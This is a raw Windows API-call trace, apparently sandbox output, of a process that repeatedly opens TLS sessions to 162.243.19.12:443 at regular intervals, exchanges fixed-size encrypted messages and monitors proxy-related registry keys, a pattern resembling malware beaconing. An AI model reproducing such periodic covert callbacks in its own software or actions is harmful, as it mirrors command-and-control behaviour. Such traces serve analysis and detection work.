	[0519.916] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb049d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0519.919] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0519.920] CertDuplicateCertificateContext (pCertContext=0x2ad3bb049d0) returned 0x2ad3bb049d0
	[0519.921] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0519.924] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0519.924] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0519.924] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0519.924] SetLastError (dwErrCode=0x0) 
	[0519.924] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0519.926] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0519.926] CertFreeCertificateContext (pCertContext=0x2ad3bb049d0) returned 1
	[0519.926] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b9c2e8, MessageSeqNo=0x0 | out: pMessage=0x2ad23b9c2e8) returned 0x0
	[0519.927] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca0d0
	[0519.927] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca0d0*=((len=0x3b, buf=0x2ad23b995a8*), (len=0xd5, buf=0x2ad23b9c0f0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca0d0*=((len=0x3b, buf=0x2ad23b995a8*), (len=0xd5, buf=0x2ad23b9c0f0*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0519.927] CoTaskMemFree (pv=0x2ad3baca0d0) 
	[0519.928] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0519.928] recv (in: s=0x7d0, buf=0x2ad23b9c490, len=5, flags=0 | out: buf=0x2ad23b9c490*) returned 5
	[0520.428] recv (in: s=0x7d0, buf=0x2ad23b9c4b5, len=1488, flags=0 | out: buf=0x2ad23b9c4b5*) returned 1488
	[0520.429] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b9cb98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b9cb98, pfQOP=0x0) returned 0x0
	[0520.431] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0520.431] SetEvent (hEvent=0x6b8) returned 1
	[0520.510] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0533.517] CloseHandle (hObject=0x3f4) returned 1
	[0533.892] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0533.892] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d8) returned 0x0
	[0533.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0533.893] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0533.894] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0533.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0533.894] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x388, fAsynchronous=1) returned 0x0
	[0533.896] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x164) returned 0x0
	[0533.896] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0533.896] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0533.896] GetCurrentProcess () returned 0xffffffffffffffff
	[0533.896] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0xe4) returned 1
	[0533.896] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1a780
	[0533.897] WinHttpSetTimeouts (hInternet=0x2ad3bb1a780, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0533.897] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0533.933] SetEvent (hEvent=0x6b8) returned 1
	[0533.933] select (in: nfds=0, readfds=0x2ad23ba4590, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23ba4590, writefds=0x0, exceptfds=0x0) returned 1
	[0533.934] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0533.940] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0533.942] shutdown (s=0x7d0, how=2) returned 0
	[0533.944] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0533.944] closesocket (s=0x7d0) returned 0
	[0533.946] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0533.947] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x270
	[0533.948] WSAConnect (in: s=0x7d0, name=0x2ad23ba5d28*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0534.058] closesocket (s=0x270) returned 0
	[0534.059] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23ba2cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23ba65b0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23ba65b0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0534.061] FreeContextBuffer (in: pvContextBuffer=0x2ad3bae01f0 | out: pvContextBuffer=0x2ad3bae01f0) returned 0x0
	[0534.061] send (in: s=0x7d0, buf=0x2ad23ba6680*, len=333, flags=0 | out: buf=0x2ad23ba6680*) returned 333
	[0534.062] recv (in: s=0x7d0, buf=0x2ad23ba6680, len=5, flags=0 | out: buf=0x2ad23ba6680*) returned 5
	[0534.179] recv (in: s=0x7d0, buf=0x2ad23ba6685, len=49, flags=0 | out: buf=0x2ad23ba6685*) returned 49
	[0534.179] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23ba2cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23ba68c0, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23ba68e0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23ba68e0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0534.180] recv (in: s=0x7d0, buf=0x2ad23ba69d0, len=5, flags=0 | out: buf=0x2ad23ba69d0*) returned 5
	[0534.180] recv (in: s=0x7d0, buf=0x2ad23ba69f5, len=1, flags=0 | out: buf=0x2ad23ba69f5*) returned 1
	[0534.180] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23ba2cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23ba6ac8, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23ba6ae8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23ba6ae8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0534.181] recv (in: s=0x7d0, buf=0x2ad23ba6bd8, len=5, flags=0 | out: buf=0x2ad23ba6bd8*) returned 5
	[0534.181] recv (in: s=0x7d0, buf=0x2ad23ba6bfd, len=48, flags=0 | out: buf=0x2ad23ba6bfd*) returned 48
	[0534.181] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23ba2cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23ba6d00, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23ba6d20, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23ba6d20, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0534.185] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2b40 | out: pvContextBuffer=0x2ad3bad2b40) returned 0x0
	[0534.185] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23ba6e68 | out: pBuffer=0x2ad23ba6e68) returned 0x0
	[0534.185] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23ba6ec0 | out: pBuffer=0x2ad23ba6ec0) returned 0x0
	[0534.186] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23ba6f28 | out: pBuffer=0x2ad23ba6f28) returned 0x0
	[0534.186] CertDuplicateCertificateContext (pCertContext=0x2ad3bb060d0) returned 0x2ad3bb060d0
	[0534.187] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0534.187] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb060d0
	[0534.187] CertDuplicateCertificateContext (pCertContext=0x2ad3bb060d0) returned 0x2ad3bb060d0
	[0534.187] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb060d0) returned 0x0
	[0534.188] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0534.188] CertFreeCertificateContext (pCertContext=0x2ad3bb060d0) returned 1
	[0534.190] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0534.190] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb060d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0534.191] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb060d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0534.193] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0534.195] CertDuplicateCertificateContext (pCertContext=0x2ad3bb060d0) returned 0x2ad3bb060d0
	[0534.195] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0534.196] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0534.196] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0534.197] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0534.197] SetLastError (dwErrCode=0x0) 
	[0534.197] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0534.197] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0534.198] CertFreeCertificateContext (pCertContext=0x2ad3bb060d0) returned 1
	[0534.198] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23ba9b30, MessageSeqNo=0x0 | out: pMessage=0x2ad23ba9b30) returned 0x0
	[0534.198] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9f50
	[0534.198] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9f50*=((len=0x3b, buf=0x2ad23ba6df0*), (len=0xd5, buf=0x2ad23ba9938*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9f50*=((len=0x3b, buf=0x2ad23ba6df0*), (len=0xd5, buf=0x2ad23ba9938*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0534.199] CoTaskMemFree (pv=0x2ad3bac9f50) 
	[0534.199] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0534.199] recv (in: s=0x7d0, buf=0x2ad23ba9cd8, len=5, flags=0 | out: buf=0x2ad23ba9cd8*) returned 5
	[0534.690] recv (in: s=0x7d0, buf=0x2ad23ba9cfd, len=1488, flags=0 | out: buf=0x2ad23ba9cfd*) returned 1488
	[0534.691] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23baa3e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23baa3e0, pfQOP=0x0) returned 0x0
	[0534.693] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0534.693] SetEvent (hEvent=0x6b8) returned 1
	[0534.754] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0555.761] CloseHandle (hObject=0x3f4) returned 1
	[0556.252] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0556.252] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d8) returned 0x0
	[0556.253] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0556.253] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0556.256] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0556.257] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0556.257] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x388, fAsynchronous=1) returned 0x0
	[0556.259] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x164) returned 0x0
	[0556.259] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0556.259] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0556.260] GetCurrentProcess () returned 0xffffffffffffffff
	[0556.260] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0xe4) returned 1
	[0556.260] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19680
	[0556.261] WinHttpSetTimeouts (hInternet=0x2ad3bb19680, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0556.261] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0556.285] SetEvent (hEvent=0x6b8) returned 1
	[0556.288] select (in: nfds=0, readfds=0x2ad23bb1dd8, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bb1dd8, writefds=0x0, exceptfds=0x0) returned 1
	[0556.288] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0556.291] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0556.294] shutdown (s=0x7d0, how=2) returned 0
	[0556.297] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0556.297] closesocket (s=0x7d0) returned 0
	[0556.299] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0556.300] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x270
	[0556.300] WSAConnect (in: s=0x7d0, name=0x2ad23bb3570*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0556.412] closesocket (s=0x270) returned 0
	[0556.414] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bb0518, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bb3df8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bb3df8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0556.415] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfac0 | out: pvContextBuffer=0x2ad3badfac0) returned 0x0
	[0556.415] send (in: s=0x7d0, buf=0x2ad23bb3ec8*, len=333, flags=0 | out: buf=0x2ad23bb3ec8*) returned 333
	[0556.416] recv (in: s=0x7d0, buf=0x2ad23bb3ec8, len=5, flags=0 | out: buf=0x2ad23bb3ec8*) returned 5
	[0556.521] recv (in: s=0x7d0, buf=0x2ad23bb3ecd, len=49, flags=0 | out: buf=0x2ad23bb3ecd*) returned 49
	[0556.521] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bb0518, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bb4108, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bb4128, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bb4128, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0556.522] recv (in: s=0x7d0, buf=0x2ad23bb4218, len=5, flags=0 | out: buf=0x2ad23bb4218*) returned 5
	[0556.522] recv (in: s=0x7d0, buf=0x2ad23bb423d, len=1, flags=0 | out: buf=0x2ad23bb423d*) returned 1
	[0556.522] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bb0518, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bb4310, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bb4330, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bb4330, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0556.522] recv (in: s=0x7d0, buf=0x2ad23bb4420, len=5, flags=0 | out: buf=0x2ad23bb4420*) returned 5
	[0556.522] recv (in: s=0x7d0, buf=0x2ad23bb4445, len=48, flags=0 | out: buf=0x2ad23bb4445*) returned 48
	[0556.522] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bb0518, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bb4548, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bb4568, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bb4568, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0556.524] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2a80 | out: pvContextBuffer=0x2ad3bad2a80) returned 0x0
	[0556.524] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bb46b0 | out: pBuffer=0x2ad23bb46b0) returned 0x0
	[0556.525] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bb4708 | out: pBuffer=0x2ad23bb4708) returned 0x0
	[0556.526] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bb4770 | out: pBuffer=0x2ad23bb4770) returned 0x0
	[0556.526] CertDuplicateCertificateContext (pCertContext=0x2ad3bb061d0) returned 0x2ad3bb061d0
	[0556.527] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0556.527] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb061d0
	[0556.527] CertDuplicateCertificateContext (pCertContext=0x2ad3bb061d0) returned 0x2ad3bb061d0
	[0556.527] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb061d0) returned 0x0
	[0556.527] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0556.528] CertFreeCertificateContext (pCertContext=0x2ad3bb061d0) returned 1
	[0556.530] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0556.530] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb061d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0556.530] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb061d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0556.532] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0556.534] CertDuplicateCertificateContext (pCertContext=0x2ad3bb061d0) returned 0x2ad3bb061d0
	[0556.534] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0556.536] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0556.536] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0556.536] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0556.536] SetLastError (dwErrCode=0x0) 
	[0556.536] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0556.536] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0556.536] CertFreeCertificateContext (pCertContext=0x2ad3bb061d0) returned 1
	[0556.537] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bb7378, MessageSeqNo=0x0 | out: pMessage=0x2ad23bb7378) returned 0x0
	[0556.537] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca490
	[0556.537] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca490*=((len=0x3b, buf=0x2ad23bb4638*), (len=0xd5, buf=0x2ad23bb7180*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca490*=((len=0x3b, buf=0x2ad23bb4638*), (len=0xd5, buf=0x2ad23bb7180*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0556.537] CoTaskMemFree (pv=0x2ad3baca490) 
	[0556.537] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0556.537] recv (in: s=0x7d0, buf=0x2ad23bb7520, len=5, flags=0 | out: buf=0x2ad23bb7520*) returned 5
	[0557.054] recv (in: s=0x7d0, buf=0x2ad23bb7545, len=1488, flags=0 | out: buf=0x2ad23bb7545*) returned 1488
	[0557.054] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bb7c28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bb7c28, pfQOP=0x0) returned 0x0
	[0557.055] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0557.055] SetEvent (hEvent=0x6b8) returned 1
	[0557.092] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0576.095] CloseHandle (hObject=0x3f4) returned 1
	[0576.215] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0576.216] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d8) returned 0x0
	[0576.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0576.216] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0576.216] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0576.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0576.216] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x388, fAsynchronous=1) returned 0x0
